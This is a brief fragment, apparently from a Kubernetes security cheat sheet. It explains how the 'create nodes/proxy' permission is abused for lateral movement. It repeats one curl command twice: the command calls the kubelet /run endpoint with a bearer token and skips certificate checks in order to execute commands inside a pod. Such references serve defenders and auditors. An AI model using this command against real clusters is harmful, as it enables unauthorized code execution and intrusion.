create nodes/proxy
Abuses
Lateral Movement
Execute commands in a pod
curl -k -H "Authorization: Bearer TOKEN" -XPOST https://{IP}:10250/run/NAMESPACE/POD/CONTAINER -d "cmd=whoami"
Execute commands in a pod
curl -k -H "Authorization: Bearer TOKEN" -XPOST https://{IP}:10250/run/NAMESPACE/POD/CONTAINER -d "cmd=whoami"